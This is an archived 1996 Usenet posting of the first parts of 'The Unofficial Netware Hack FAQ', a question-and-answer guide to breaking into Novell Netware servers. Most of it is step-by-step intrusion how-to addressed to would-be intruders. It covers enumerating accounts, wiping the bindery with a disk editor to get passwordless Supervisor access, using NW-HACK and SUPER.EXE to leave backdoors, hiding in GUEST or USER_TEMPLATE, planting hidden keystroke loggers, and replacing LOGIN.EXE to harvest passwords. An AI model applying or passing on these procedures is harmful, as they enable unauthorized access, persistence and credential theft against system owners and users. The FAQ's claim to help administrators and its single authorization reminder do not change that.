home *** CD-ROM | disk | FTP | other *** search
/ SuperHack / SuperHack CD.bin / Hack / MISC / NETWAREH.ZIP / NETWAREH.FAQ
Encoding:
Internet Message Format  |  1996-03-21  |  125.2 KB

  1. From the Nomad Mobile Research Centre:
  2.  
  3.              Frequently Asked Questions 
  4.                    About
  5.                Hacking Novell Netware
  6.  
  7.              "The Unofficial Netware Hack FAQ"
  8.  
  9.                    Beta Version 3
  10.  
  11.               Compiled by Simple Nomad
  12.  
  13.  
  14. Contributions (and thanks to):  
  15.  
  16. The LAN God
  17. Teiwaz         teiwaz@wolfe.net
  18. Fauzan Mirza   fauzanm@jumper.mcc.ac.uk
  19. Jeff Carr      jcarr@kpmg.com.au
  20. David A Wagner daw@lagos.CS.Berkeley.EDU
  21. Diceman        diceman@fl.net.au
  22. PEME_Inc
  23.  
  24. Extra thanks to BioHazard, Mickey, and Al Payne for their kindness in 
  25. redistribution of the FAQ. And hello to several friends - Mr. Wizard, The 
  26. Raven, Riker, Route, B.C. And thanks to many others who requested anonymity 
  27. or didn't realize they were contributing ;-)
  28.  
  29. Tech Support (and special thanks to):
  30.  
  31. itsme - infamous Netware Netherlands hack fame
  32.  
  33. Been real busy playing with Netware 4.1, and it shows. You asked for it,
  34. you got it. Netware 4.1 hack info, straight from the insecure LANs of
  35. corporate and education locations everywhere. I've also received a lot of
  36. email, particularly since Al's HTML version of the FAQ is getting accessed
  37. pretty heavily. The main question I am asked is by Admins - am I secure? I
  38. try and address this at the end of the FAQ but the answer is no. No system
  39. is completely secure.
  40.  
  41. I will include Win95/Netware info next version of the FAQ. Not enough time
  42. to include stuff this time, so if you have stuff, send it.
  43.  
  44. S.N.
  45.  
  46. ---------------------------------------------------------------------------
  47. ---------------------------------------------------------------------------
  48.  
  49. Contents
  50.  
  51. U means update from last FAQ, N means new.
  52.  
  53.  
  54. ---------------------------------------------------------------------------
  55.  
  56. Section 00
  57.  
  58. General Info
  59.  
  60.   00-1. What is this "FAQ" for?
  61.   00-2. What is the origin of this FAQ and how do I add to it?
  62. U 00-3. Is this FAQ available by anonymous FTP or WWW?
  63.  
  64. ---------------------------------------------------------------------------
  65.  
  66. Section 01
  67.  
  68. Access to Accounts
  69.  
  70. U 01-1. What are common accounts and passwords in Novell Netware?
  71. U 01-2. How can I figure out valid account names on Novell Netware?
  72.   01-3. What is the "secret" method to gain Supervisor access Novell used to 
  73.   teach in CNE classes?
  74.   01-4. What is the cheesy way to get Supervisor access?
  75.   01-5. How do I leave a backdoor?
  76. N 01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access?
  77.  
  78. ---------------------------------------------------------------------------
  79.  
  80. Section 02
  81.  
  82. Passwords
  83.  
  84.   02-1. How do I access the password file in Novell Netware?
  85.   02-2. How do I crack Novell Netware passwords?
  86. N 02-3. What is a "brute force" password cracker?
  87. N 02-4. What is a "dictionary" password cracker?
  88.   02-5. How do I use SETPWD.NLM? 
  89.   02-6. What's the "debug" way to disable passwords?
  90. N 02-7. Exactly how do passwords get encrypted?
  91.  
  92. ---------------------------------------------------------------------------
  93.  
  94. Section 03
  95.  
  96. Accounting and Account Security
  97.  
  98.   03-1. What is Accounting?
  99.   03-2. How do I defeat Accounting?
  100.   03-3. What is Intruder Detection?
  101. N 03-4. How do I check for Intruder Detection?
  102. U 03-5. What are station/time restrictions?
  103.   03-6. How do I spoof my node or IP address?
  104.  
  105. ---------------------------------------------------------------------------
  106.  
  107. Section 04
  108.  
  109. The Console
  110.  
  111.   04-1. How do I defeat console logging?
  112.   04-2. Can I set the RCONSOLE password to work for just Supervisor?
  113. N 04-3. How can I get around a locked MONITOR?
  114.  
  115. ---------------------------------------------------------------------------
  116.  
  117. Section 05
  118.  
  119. File and Directory Access
  120.  
  121.   05-1. How can I see hidden files and directories?
  122.   05-2. How do I defeat the execute-only flag?
  123.   05-3. How can I hide my presence after altering files?
  124.   05-4. What is a Netware-aware trojan?
  125.   05-5. What are Trustee Directory Assignments?
  126.   05-6. Are there any default Trustee Assignments that can be exploited?
  127.   05-7. What are some general ways to exploit Trustee Rights?
  128.   05-8. Can access to .NCF files help me?
  129.  
  130. ---------------------------------------------------------------------------
  131.  
  132. Section 06
  133.  
  134. Fun with Netware 4.1
  135.  
  136.   06-1. What is interesting about Netware 4.x's licensing?
  137. N 06-2. How can I tell if something is being Audited?
  138. N 06-3. Where are the Login Scripts stored and can I edit them?
  139. N 06-4. What is the rumored "backdoor" in NDS?
  140. N 06-5. How can I remove NDS?
  141. N 06-6. How can I remove Auditing if I lost the Audit password?
  142. N 06-7. Does 4.x store the LOGIN password to a temporary file?
  143. N 06-8. Everyone can make themselves equivalent to anyone including Admin. 
  144.     How?
  145. N 06-9. Can I reset an NDS password with just limited rights?
  146. N 06-10. What is OS2NT.NLM?
  147. N 06-11. Do you have to be Admin equivalent to reset a password?
  148.  
  149. ---------------------------------------------------------------------------
  150.  
  151. Section 07
  152.  
  153. Miscellaneous Info on Netware
  154.  
  155.   07-1. Why can't I get through the 3.x server to another network via TCP/IP?
  156.   07-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF?
  157.   07-3. How can I login without running the System Login Script?
  158.   07-4. How do I remotely reboot a Netware 3.x file server?
  159.   07-5. How can I abend a Netware server? And why?
  160.   07-6. What is Netware NFS and is it secure?
  161.   07-7. Can sniffing packets help me break in?
  162. N 07-8. What else can sniffing get me?
  163.   07-9. How does password encryption work?
  164. N 07-10. Are there products to help improve Netware's security?
  165.   07-11. What is Packet Signature and how do I get around it?
  166. N 07-12. Do any Netware utilities have holes like Unix utilities?
  167.  
  168. ---------------------------------------------------------------------------
  169.  
  170. Section 08
  171.  
  172. Resources
  173.  
  174. U 08-1. What are some Netware FTP locations?
  175.   08-2. Can I get files without FTP?
  176. U 08-3. What are some Netware WWW locations?
  177.   08-4. What are some Netware USENET groups?
  178.   08-5. What are some Netware mailing lists?
  179.   08-6. Where are some other Netware FAQs?
  180. U 08-7. Where can I get the files mentioned in this FAQ?
  181.   08-8. What are some good books for Netware?
  182.  
  183. ---------------------------------------------------------------------------
  184.  
  185. Section 09
  186.  
  187. Netware APIs
  188.  
  189.   09-1. Where can I get the Netware APIs?
  190. U 09-2. Are there alternatives to Netware's APIs?
  191.  
  192. ---------------------------------------------------------------------------
  193.  
  194. Section 10
  195.  
  196. For Administrators Only
  197.  
  198. U 10-1. How do I secure my server?
  199.   10-2. I'm an idiot. Exactly how do hackers get in?
  200. N 10-3. I have xxx setup and xxx version running. Am I secure?
  201.  
  202. ---------------------------------------------------------------------------
  203.  
  204.  
  205. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  206. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  207. -              - thegnome@onyx.infonexus.com
  208. -      URL     - http://www.fastlane.net/homepages/thegnome
  209. -    Secrets   - Get "new" PGP key via my home page
  210.  
  211. From netcom.com!ix.netcom.com!howland.reston.ans.net!nntp.coast.net!chi-news.cic.net!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:28 1996
  212. Xref: netcom.com alt.2600:178176 comp.os.netware.security:3201 comp.security.misc:27777
  213. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!nntp.coast.net!chi-news.cic.net!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  214. From: thegnome@fastlane.net (Simple Nomad)
  215. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  216. Subject: Novell Hack FAQ -- Part 2 of 12
  217. Date: 8 Mar 1996 04:30:28 GMT
  218. Organization: Nomad Mobile Research Centre
  219. Lines: 59
  220. Message-ID: <4hod54$ih0@news2.nkn.net>
  221. NNTP-Posting-Host: fw47.fastlane.net
  222. X-Newsreader: WinVN 0.92.6+
  223.  
  224. ---------------------------------------------------------------------------
  225.  
  226. Section 00
  227.  
  228. General Info
  229.  
  230. ---------------------------------------------------------------------------
  231.  
  232. 00-1. What is this "FAQ" for?
  233.  
  234. This FAQ contains information about hacking Novell Netware. It is intented to
  235. show what and how regarding hacking on Netware, and by illustrating this in
  236. explicit detail show how sys admins can improve security and prevent break-ins. 
  237. Most of the information in this FAQ was compiled and collected from various 
  238. sources freely available on the Internet. In fact, most of the information here 
  239. is OLD info for serious Netware hackers. Some of the info was collected from 
  240. these serious Netware hackers, and still more was collected from "tiger team" 
  241. security sweeps that I have been involved in.
  242.  
  243. You will also find hints and generally good ideas for improving and/or expanding 
  244. an existing system. This FAQ is a good reference for sys admins as well as
  245. hackers. 
  246.  
  247. ---------------------------------------------------------------------------
  248.  
  249. 00-2. What is the origin of this FAQ and how do I add to it?
  250.  
  251. Send comments about info in this FAQ to thegnome@fastlane.net. Simple flames
  252. about typos, the "that's not right" one liners will be ignored. If you wish to
  253. contribute corrections please include your research and source of facts. Also
  254. if you wish to add your information, I will include it if I can include your
  255. email address, unless I can verify the info independently. This way if someone
  256. has questions, they can bug you, not me.
  257.  
  258. ---------------------------------------------------------------------------
  259.  
  260. 00-3. Is this FAQ available by anonymous FTP or WWW?
  261.  
  262. Look for it in the following locations:
  263.  
  264. jumper.mcc.ac.uk    /pub/security/netware     faq.zip
  265. ftp.fastlane.net    /pub/nomad/nw             faq.zip
  266. ftp.best.com        /pub/almcepud/hacks       faq.zip
  267.  
  268. ftp://infonexus.com/pub/Philes/FAQS/netwareHack.faq.txt.gz
  269. http://resudox.net/bio/mainpage.html in the Netware section.
  270.  
  271. Entire FAQ Online, and the reason Al has fits with his ISP ;-):
  272.  
  273. http://www.interlog.com/~apayne/nwhack.html
  274.  
  275. ---------------------------------------------------------------------------
  276.  
  277.  
  278. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  279. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  280. -              - thegnome@onyx.infonexus.com
  281. -      URL     - http://www.fastlane.net/homepages/thegnome
  282. -    Secrets   - Get "new" PGP key via my home page
  283.  
  284. From netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:28 1996
  285. Xref: netcom.com alt.2600:178177 comp.os.netware.security:3202 comp.security.misc:27778
  286. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  287. From: thegnome@fastlane.net (Simple Nomad)
  288. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  289. Subject: Novell Hack FAQ -- Part 3 of 12
  290. Date: 8 Mar 1996 04:36:53 GMT
  291. Organization: Nomad Mobile Research Centre
  292. Lines: 303
  293. Message-ID: <4hodh5$ih0@news2.nkn.net>
  294. NNTP-Posting-Host: fw47.fastlane.net
  295. X-Newsreader: WinVN 0.92.6+
  296.  
  297. ---------------------------------------------------------------------------
  298.  
  299. Section 01
  300.  
  301. Access to Accounts
  302.  
  303. ---------------------------------------------------------------------------
  304.  
  305. 01-1. What are common accounts and passwords in Novell Netware?
  306.  
  307. Out of the box Novell Netware has the following default accounts -
  308. SUPERVISOR, GUEST, and Netware 4.x has ADMIN and USER_TEMPLATE as well. All
  309. of these have no password to start with. Virtually every installer quickly
  310. gives SUPERVISOR and ADMIN a password. However, many locations will create 
  311. special purpose accounts that have easy-to-guess names, some with no
  312. passwords. Here are a few and their typical purposes:
  313.  
  314.     Account         Purpose
  315.     ----------      ------------------------------------------------------
  316.     PRINT           Attaching to a second server for printing
  317.     LASER           Attaching to a second server for printing
  318.     HPLASER         Attaching to a second server for printing
  319.     PRINTER         Attaching to a second server for printing
  320.     LASERWRITER     Attaching to a second server for printing
  321.     POST            Attaching to a second server for email
  322.     MAIL            Attaching to a second server for email
  323.     GATEWAY         Attaching a gateway machine to the server
  324.     GATE            Attaching a gateway machine to the server
  325.     ROUTER          Attaching an email router to the server
  326.     BACKUP          May have password/station restrictions (see below), used
  327.             for backing up the server to a tape unit attached to a
  328.             workstation. For complete backups, Supervisor equivalence
  329.             is required.
  330.     WANGTEK         See BACKUP
  331.     FAX             Attaching a dedicated fax modem unit to the network
  332.     FAXUSER         Attaching a dedicated fax modem unit to the network
  333.     FAXWORKS        Attaching a dedicated fax modem unit to the network
  334.     TEST            A test user account for temp use
  335.     ARCHIVIST       Palidrome default account for backup
  336.     CHEY_ARCHSVR    An account for Arcserve to login to the server from    
  337.             from the console for tape backup. Version 5.01g's
  338.             password was WONDERLAND. Delete the Station
  339.             Restrictions and use SUPER.EXE to toggle this 
  340.             account and you have an excellent backdoor.
  341.     WINDOWS_PASSTHRU Although not required, per the Microsoft Win95
  342.             Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you
  343.             need this for resource sharing without a password.
  344.  
  345. This should give you an idea of accounts to try if you have access to a
  346. machine that attaches to the server. A way to "hide" yourself is to give
  347. GUEST or USER_TEMPLATE a password. Occassionally admins will check up on
  348. GUEST, but most forget about USER_TEMPLATE. In fact, _I_ forgot about
  349. USER_TEMPLATE until itsme reminded me.
  350.  
  351. ---------------------------------------------------------------------------
  352.  
  353. 01-2. How can I figure out valid account names on Novell Netware?
  354.  
  355. Any limited account should have enough access to allow you to run SYSCON,
  356. located in the SYS:PUBLIC directory. If you get in, type SYSCON and enter.
  357. Now go to User Information and you will see a list of all defined accounts.
  358. You will not get much info with a limited account, but you can get the
  359. account and the user's full name.
  360.  
  361. If your in with any valid account, you can run USERLST.EXE and get a list
  362. of all valid account names on the server.
  363.  
  364. If you don't have access (maybe the sys admin deleted the GUEST account,
  365. a fairly common practice), you can't just try any account name at the LOGIN
  366. prompt. It will ask you for a password whether the account name is valid or
  367. not, and if it is valid and you guees the wrong password, you could be
  368. letting the world know what you're up to if Intruder Detection is on. But
  369. there is a way to determine if an account is valid.
  370.  
  371. From a DOS prompt use a local copy (on your handy floppy you carry
  372. everywhere) of MAP.EXE. After you've loaded the Netware TSRs up through
  373. NETX or VLM, Try to map a drive using the server name and volume SYS:.
  374. For example:
  375.  
  376.     MAP G:=TARGET_SERVER/SYS:APPS <enter>
  377.  
  378. Since you are not logged in, you will be prompted for a login ID. If it
  379. is a valid ID, you will be prompted for a password. If not, you will
  380. immediately receive an error. Of course, if there is no password for the
  381. ID you use you will be attached and mapped to the server. You can do the
  382. same thing with ATTACH.EXE:
  383.  
  384.     ATTACH TARGET_SERVER/loginidtotry <enter>
  385.  
  386. The same thing will happen as the MAP command. If valid, you will be
  387. prompted for a password. If not, you get an error.
  388.  
  389. Another program to check for valid users and the presence of a password is
  390. CHKNULL.EXE by itsme. This program checks for users and whether they have
  391. a password assigned.
  392.  
  393. In 4.1 CHKNULL shows you every account with no password and you do not
  394. have to be logged in. For this to work bindery emulation must be on. But 
  395. there is another way to get them in 4.1:
  396.  
  397. Once you load up the VLMs you may be able to view the entire tree, or at
  398. least all of the tree you could see if logged in. Try this:
  399.  
  400.       CX /T /A /R
  401.  
  402. During the installation of 4.1, [Public] has browse access to the entire
  403. tree because [Public] is added to [Root] as a Trustee. The Inherited Rights
  404. Filter flows this stuff down unless explicitly blocked. If you have the VLMs 
  405. loaded and access to CX, you don't even have to log in, and you can get the
  406. name of virtually every account on the server.
  407.  
  408. ---------------------------------------------------------------------------
  409.  
  410. 01-3. What is the "secret" method to gain Supervisor access Novell used to teach 
  411. in CNE classes?
  412.  
  413. Before I start this section, let me recommend another solution, my God, ANY
  414. other solution is better than this! If you are running 3.x, jump to the end of 
  415. this section.
  416.  
  417. The secret method is the method of using a DOS-based sector editor to edit the 
  418. entry in the FAT, and reset the bindery to default upon server reboot. This gives 
  419. you Supervisor and Guest with no passwords. The method was taught in case you 
  420. lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts 
  421. created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed.
  422.  
  423. While you get a variety of answers from Novell about this technique, from it 
  424. doesn't work to it is technically impossible, truth be it it can be  done. Here 
  425. are the steps, as quoted from comp.os.netware.security, with my comments in 
  426. [brackets]:
  427.  
  428. [start of quote]
  429. A Netware Server is supposed to be a very safe place to keep your files. Only
  430. people with the right password will have access to the data stored there. The
  431. Supervisor (or Admin) user's password is usually the most well kept secret in
  432. the company, since anyone that has that code could simply log to the server and 
  433. do anything he/she wants.
  434.  
  435. But what happens if this password is lost and there's no user that is 
  436. security-equivalent to the supervisor? [Use SETPWD.NLM, instead of this process,
  437. see section 02-3 - S.N.] What happens if the password system is somehow damaged
  438. and no one can log to the network? According to the manual, there's simply no 
  439. way out. You would have to reinstall the server and try to find your most recent 
  440. backup. 
  441.  
  442. Fortunately, there is a very interesting way to gain complete access to a Netware
  443. server without knowing the Supervisor's (or Admin's) password. You may imagine
  444. that you would have to learn complex decryption techniques or even type in a long
  445. C program, but that's not the case. The trick is so simple and generic that it
  446. will work the same way for Netware 2.x, 3.x and 4.x. 
  447.  
  448. The idea is to fool Netware to think that you have just installed the server and
  449. that no security system has been estabilished yet. Just after a Netware 2.x or
  450. 3.x server is installed, the Supervisor's password is null and you can log in
  451. with no restriction. Netware 4.x works slightly differently, but it also allows
  452. anyone to log in after the initial installation, since the installer is asked to
  453. enter a password for the Admin user.
  454.  
  455. But how can you make the server think it has just been installed  without
  456. actually reinstalling the server and losing all data on the disk? Simple. You
  457. just delete the files that contain the security system. In Netware 2.x, all
  458. security information is stored in two files (NET$BIND.SYS and NET$BVAL.SYS).
  459. Netware 3.x stores that information in three files (NET$OBJ.SYS, NET$VAL.SYS and
  460. NET$PROP.SYS). The all new Netware 4.x system stores all login names and 
  461. passwords in five different files (PARTITIO.NDS, BLOCK.NDS, ENTRY.NDS, VALUE.NDS
  462. and UNINSTAL.NDS [This last file may not be there, don't worry - S.N.]).
  463.  
  464. One last question remains. How can we delete these files if we don't have access
  465. to the network, anyway? The answer is, again, simple. Altough the people from
  466. Novell did a very good job encrypting passwords, they let all directory
  467. information easy to find and change if you can access the server's disk directly,
  468. using common utilities like Norton's Disk Edit. Using this utility as an example,
  469. I'll give a step-by-step procedure to make these files vanish. All you need is a
  470. bootable DOS disk,  Norton Utilities' Emergency Disk containing the DiskEdit
  471. program and some time near the server.
  472.  
  473. 1. Boot the server and go to the DOS prompt. To do this, just let the network
  474. boot normally and then use the DOWN and EXIT commands. This procedure does not
  475. work on old Netware 2.x servers and in some installations where DOS has been 
  476. removed from memory. In those cases, you'll have to use a DOS bootable disk.
  477.  
  478. 2. Run Norton's DiskEdit utility from drive A:
  479.  
  480. 3. Select "Tools" in the main menu and then select "Configuration". At the
  481. configuration window, uncheck the "Read-Only" checkbox. And be very careful with
  482. everything you type after this point.
  483.  
  484. 4. Select "Object" and then "Drive". At the window, select the C: drive and make
  485. sure you check the button "physical drive". After that, you'll be looking at your
  486. physical disk and you be able to see (and change) everything on it.
  487.  
  488. 5. Select "Tools" and then "Find". Here, you'll enter the name of the file you 
  489. are trying to find. Use "NET$BIND" for Netware 2,  "NET$PROP.SYS"  for  Netware 3 and "PARTITIO.NDS" for Netware 4. It is possible that you find these strings in a
  490. place that is not the Netware directory. If the file names are not all near each
  491. other and proportionaly separated by some unreadable codes (at least 32 bytes
  492. between them), then you it's not the place we are looking for. In that case, 
  493. you'll have to keep searching by selecting "Tools" and then "Find again". [In
  494. Netware 3.x, you can change all occurences of the bindery files and it should
  495. still work okay, I've done it before. - S.N.]
  496.  
  497. 6. You found the directory and you are ready to change it. Instead of deleting 
  498. the files, you'll be renaming them. This will avoid problems with the directory
  499. structure (like lost FAT chains). Just type "OLD" over the existing "SYS" or
  500. "NDS" extension. Be extremely careful and don't change anything else.
  501.  
  502. 7. Select "Tools" and then "Find again". Since Netware store the directory
  503. information in two different places, you have to find the other copy and change 
  504. it the same way. This will again prevent directory structure problems.
  505.  
  506. 8. Exit Norton Disk Edit and boot the server again. If you're running Netware 2 
  507. or 3, your server would be already accessible. Just go to any station and log in 
  508. as user Supervisor. No password will be asked. If you're running Netware 4, there
  509. is one last step.
  510.  
  511. 9. Load Netware 4 install utility (just type LOAD INSTALL at the console prompt) 
  512. and select the options to install the Directory Services. You be prompted for the
  513. Admin password while doing this. After that, you may go to any station and log in
  514. as user Admin, using the password that you have selected.
  515.  
  516. What I did with Norton's Disk Edit could be done with any disk editing utility 
  517. with a "Search" feature. This trick has helped me save many network supervisors 
  518. in the last years. I would just like to remind you that no one should break into
  519. a netware server unless authorized to do it by the company that owns the server. 
  520. But you problably know that already.
  521. [end of quote]
  522.  
  523. I actually had this typed up but kept changing it, so I stole this quote from
  524. the newsgroup to save me retyping ;-)
  525.  
  526. Now the quicky for 3.x users. Use LASTHOPE.NLM, which renames the bindery and
  527. downs the server. Reboot and you have Supe and Guest, no password.
  528.  
  529. ---------------------------------------------------------------------------
  530.  
  531. 01-4. What is the cheesy way to get Supervisor access?
  532.  
  533. The cheesy way is the way that will get you in, but it will be obvious to the 
  534. server's admin that the server has been compromised. This technique works for 
  535. 3.11.
  536.  
  537. Using NW-HACK.EXE, if the Supervisor is logged in NW-HACK does the following 
  538. things. 1) The Supervisor password is changed to SUPER_HACKER, 2) every account 
  539. on the server is made a supe equivalent, and 3) the sys admin is going to know 
  540. very quickly something is wrong. What the admin will do is remove the supe rights 
  541. from all accounts that are not supposed to have it and change the Supervisor 
  542. password back. The only thing you can do is leave a backdoor for yourself (see 
  543. next question).
  544.  
  545. ---------------------------------------------------------------------------
  546.  
  547. 01-5. How do I leave a backdoor?
  548.  
  549. Once you are in, you want to leave a way back with supe equivalency. You can use 
  550. SUPER.EXE, written for the express purpose of allowing the non-supe user to 
  551. toggle on and off supe equivalency. If you use the cheesy way in (previous 
  552. question), you turn on the toggle before the admin removes your supe 
  553. equivalency. If you gain access to a supe equivalent account, give Guest supe 
  554. equivalency and then login as Guest and toggle it on. Now get back in as the 
  555. original supe account and remove the supe equivalency. Now Guest can toggle on 
  556. supe equivalency whenever it's convenient.
  557.  
  558. Of course Guest doesn't have to be used, it could be another account, like an
  559. account used for e-mail administration or an e-mail router, a gateway's account, 
  560. you get the idea.
  561.  
  562. Now SUPER.EXE is not completely clean. Running the Security utility or Bindfix 
  563. will give away that an account has been altered at the bindery level, but the 
  564. only way for an admin to clear the error is to delete and rebuild the account.
  565.  
  566. Another backdoor is outlined in section 02-2 regarding the replacement LOGIN.EXE 
  567. and PROP.EXE
  568.  
  569. ---------------------------------------------------------------------------
  570.  
  571. 01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access?
  572.  
  573. If you have two volumes or some unallocated disk space you can use this
  574. hack to get Supe. Of course you need physical access but it works. I got
  575. this from a post in comp.os.security.netware
  576.  
  577.   - Dismount all volumes
  578.   - Rename SYS: to SYSOLD:
  579.   - Rename VOL1: (or what ever) to SYS: or create new SYS: on new disk
  580.   - Reboot server
  581.   - Mount SYS: and SYSOLD:
  582.   - Attach to server as Supervisor (Note: login not available)
  583.   - Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD
  584.   - Dismount volumes
  585.   - Rename volume back to correct names
  586.   - Reboot server
  587.   - Login as Supervisor, no password due to new bindery
  588.   - Run BINDREST
  589.   - You are currently logged in as Supe, you can create a new user as
  590.     Supe equiv and use this new user to reset Supe's password, whatever.
  591.  
  592. ---------------------------------------------------------------------------
  593.  
  594.  
  595. - Simple Nomad - Data Wanderer, Knowledge Hunter/Gatherer
  596. -    E-Mail    - thegnome@fastlane.net - thegnome@spyder.org
  597. -              - thegnome@onyx.infonexus.com
  598. -      URL     - http://www.fastlane.net/homepages/thegnome
  599. -    Secrets   - Get "new" PGP key via my home page
  600.  
  601. From netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news Fri Mar  8 08:39:28 1996
  602. Xref: netcom.com alt.2600:178178 comp.os.netware.security:3203 comp.security.misc:27779
  603. Path: netcom.com!ix.netcom.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.internetmci.com!in2.uu.net!news.nkn.net!news
  604. From: thegnome@fastlane.net (Simple Nomad)
  605. Newsgroups: alt.2600,comp.os.netware.security,comp.security.misc
  606. Subject: Novell Hack FAQ -- Part 4 of 12
  607. Date: 8 Mar 1996 04:40:24 GMT
  608. Organization: Nomad Mobile Research Centre
  609. Lines: 283
  610. Message-ID: <4hodno$ih0@news2.nkn.net>
  611. NNTP-Posting-Host: fw47.fastlane.net
  612. X-Newsreader: WinVN 0.92.6+
  613.  
  614. ---------------------------------------------------------------------------
  615.  
  616. Section 02
  617.  
  618. Passwords
  619.  
  620. ---------------------------------------------------------------------------
  621.  
  622. 02-1. How do I access the password file in Novell Netware?
  623.  
  624. Contrary to not-so-popular belief, access to the password file in Netware is
  625. not like Unix - the password file isn't in the open. All objects and their
  626. properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS
  627. database in 4.x. An example of an object might be a printer, a group, an
  628. individual's account etc. An example of an object's properties might include
  629. an account's password or full user name, or a group's member list or full
  630. name. The bindery files attributes (or flags) in 2.x and 3.x are Hidden
  631. and System, and these files are located on the SYS: volume in the SYSTEM
  632. subdirectory. Their names are as follows:
  633.  
  634.     Netware version         File Names
  635.     ---------------         ----------
  636.     2.x                     NET$BIND.SYS, NET$BVAL.SYS
  637.     3.x                     NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS
  638.  
  639. The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located
  640. in 2.x and 3.x respectively.
  641.  
  642. In Netware 4.x, the files are physically located in a different location than
  643. on the SYS: volume. However, by using the RCONSOLE utility and using the
  644. Scan Directory option, you can see the files in SYS:_NETWARE:
  645.  
  646.     File                    What it is
  647.     --------------          --------------------------
  648.     VALUE.NDS               Part of NDS
  649.     BLOCK.NDS               Part of NDS
  650.     ENTRY.NDS               Part of NDS
  651.     PARTITIO.NDS            Type of NDS partition (replica, master, etc.)
  652.     MLS.000                 License
  653.     VALLINCEN.DAT           License validation
  654.  
  655. Here is another way to view these files, and potentially edit them. After 
  656. installing NW4 on a NW3 volume, reboot the server with a 3.x SERVER.EXE. On 
  657. volume SYS will be the _NETWARE directory. SYS:_NETWARE is hidden better on 
  658. 4.1 than 4.0x, but in 4.1 you can still see the files by scanning directory 
  659. entry numbers using NCP calls (you need the APIs for this) using function 
  660. 0x17 subfunction 0xF3.
  661.  
  662. ---------------------------------------------------------------------------
  663.  
  664. 02-2. How do I crack Novell Netware passwords?
  665.  
  666. There are a few ways to approach this. First, we'll assume Intruder Detection
  667. is turned off. We'll also assume unencrypted passwords are allowed. Hopefully
  668. you won't have to deal with packet signature (see 07-11) Then we'll assume you 
  669. have access to the console. Finally we'll assume you can plant some kind of
  670. password catcher. Access to a sniffer might help. These are a lot of ifs.
  671.  
  672. If Intruder Detection is off, you can use a "brute force" password cracker.
  673. See section 02-4 for details.
  674.  
  675. Encrypted passwords is Novell's way of protecting passwords from sniffers.
  676. Since older versions of Netware (2.15c) sent passwords as plain text over the
  677. wire, a sniffer could see the password as it went by. To secure things,
  678. Novell gave the administrator a way to control this. Later versions of the
  679. LOGIN.EXE program would encrypt the password before transmitting it across
  680. the wire to the server. But before this could happen, the shell (NETX) had
  681. to be updated. Since some locations had to have older shells and older
  682. versions of LOGIN.EXE to support older equipment, the administrator has the
  683. option of allowing unencrypted passwords to access the server. This is done
  684. by typing SET ALLOW UNENCRYPTED PASSWORDS=ON at the console or by adding it
  685. to the AUTOEXEC.NCF. The default is OFF, which means NOVELBFH could be beeping
  686. the server console every attempt! Fortunately most sites turn this switch on to
  687. support some old device.
  688.  
  689. If you have access to the console, either by standing in front of it or by
  690. RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM or SETPWD.NLM to reset passwords.
  691. Just load the NLM and pass it command line parameters:
  692.  
  693.     NLM             Account(s) reset        Netware version(s) supported
  694.     ------------    -----------------       ----------------------------
  695.     SETSPASS.NLM    SUPERVISOR              3.x
  696.     SETSPWD.NLM     SUPERVISOR              3.x, 4.x
  697.     SETPWD.NLM      any valid account       3.x, 4.x
  698.  
  699. See 02-5 for more SETPWD.NLM info.
  700.  
  701. If you can plant a password catcher or keystroke reader, you can get them
  702. this way. The LOGIN.EXE file is located in the SYS:LOGIN directory, and
  703. normally you will not have access to put a file in that directory. The best
  704. place to put a keystroke capture program is in the workstation's path, with
  705. the ATTRIB set as hidden. The advantage is that you'll get the password and
  706. Netware won't know you swiped it. The disadvantage is getting access to the
  707. machine to do this. The very best place to put one of these capture programs
  708. is on a common machine, like a pcAnywhere box, which is used for remote access.
  709. Many locations will allow pcAnywhere access to a machine with virtually no 
  710. software on it, and control security access to the LAN by using Netware's 
  711. security features. Uploading a keystroke capture program to a machine like 
  712. this defeats this.
  713.  
  714. If the system is being backed up via a workstation, this can be used as a
  715. good entry point.  These workstations have to have supe equiv to back up the 
  716. bindery and other system files.  If you can access this workstation or use 
  717. the backup systems user account name then you can get supe level login.
  718.  
  719. itsme, the notorious Netherlands Netware hacker, developed KNOCK.EXE by
  720. rewriting one byte of ATTACH.EXE to try without a password to get into a
  721. server. KNOCK.EXE utilitzes a bug that allows a non-password attach to get
  722. in. This works on versions of Netware earlier than 2.2, and 3.11. Later 
  723. versions have the bug fixed. Given enough time you will get in.
  724.  
  725. Another alternative is the replacement LOGIN.EXE by itsme. This jewel, 
  726. coupled with PROP.EXE, will create a separate property in the bindery on a
  727. 2.x or 3.x server that contains the passwords. Here is the steps to use 
  728. these powerful tools:
  729.  
  730.  - Gain access to a workstation logged in as Supervisor or equivalent (or
  731. use another technique described elsewhere for getting this type of access)
  732.  
  733.  - Run the PROP.EXE file with a -C option. This creates the new property for
  734. each bindery object. Remember, you must be a Supe for this step.
  735.  
  736.  - Replace the LOGIN.EXE in the SYS:LOGIN directory with itsme's. Be sure
  737. to flag it SRO once replaced.
  738.  
